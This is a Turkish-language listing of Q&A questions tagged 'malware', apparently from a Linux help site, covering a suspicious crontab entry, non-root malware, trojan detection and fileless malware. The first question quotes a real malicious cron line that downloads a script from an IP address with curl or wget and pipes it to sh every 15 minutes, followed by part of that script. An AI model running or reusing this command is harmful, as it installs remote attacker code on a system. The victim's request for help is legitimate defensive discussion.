«malware» etiketlenmiş sorular


2
Her 15 dakikada bir 'xribfa4' çalışan şüpheli crontab girişi
Raspberry Pi'mdeki kök crontab dosyama bir şey eklemek istedim ve bana şüpheli görünen bir girdi buldum, bunun bir kısmını Google'da aradım. Crontab girişi: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh İçeriği http://103.219.112.66:8000/i.sh: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin mkdir -p /var/spool/cron/crontabs echo "" > /var/spool/cron/root echo …
58 security  cron  malware 

8
Yönetici veya sudo ayrıcalıklarına sahip olmayan bir kullanıcı tarafından çalıştırılan kötü amaçlı yazılımlar sistemime zarar verebilir mi? [kapalı]
Linux çalıştıran bir makineye son girdikten sonra, bir kullanıcının giriş klasöründe zayıf bir parola bulunan yürütülebilir bir dosya buldum. Hasar gibi görünen şeyleri temizledim, ancak emin olmak için tam bir silme hazırlıyorum. NON-sudo veya ayrıcalıklı olmayan bir kullanıcı tarafından çalıştırılan kötü amaçlı yazılım ne yapabilir? Sadece bulaşabilir dünyaya yazılabilir izne …
30 security  malware 



4
Linux Truva Atı Nasıl Tespit Edilir ve Kaldırılır?
Son zamanlarda (yeniden) bu tökezledi: Linux Truva Atı Neredeyse Bir Yıl Boyunca Fark Edilmedi (Gerçek dışı IRCd) Evet, güvenilmeyen bir kaynaktan rastgele PPA / yazılım eklemenin sorun (veya daha kötüsü) istediğini biliyorum. Bunu asla yapmıyorum, ancak birçoğu yapıyor (birçok Linux blogu ve tabloid, süslü uygulamalar için PPA eklemeyi teşvik ediyor, …
16 security  malware 


2
fileless kötü amaçlı yazılım linux üzerinde nasıl çalışır?
Fileless malware'in tanımını anlıyorum: Dosya tabanlı olmayan ancak yalnızca bellekte bulunan kötü amaçlı kod… Daha özellikle, kötü amaçlı kötü amaçlı kod… bellekte etkin bir işleme kendini ekler… Birisi bunun bellekte aktif bir sürece kendini nasıl eklediğini açıklayabilir mi? Ayrıca, bu tür saldırılara karşı hangi (çekirdek) koruma / sertleştirme kullanılabilir?
Sitemizi kullandığınızda şunları okuyup anladığınızı kabul etmiş olursunuz: Çerez Politikası ve Gizlilik Politikası.
Licensed under cc by-sa 3.0 with attribution required.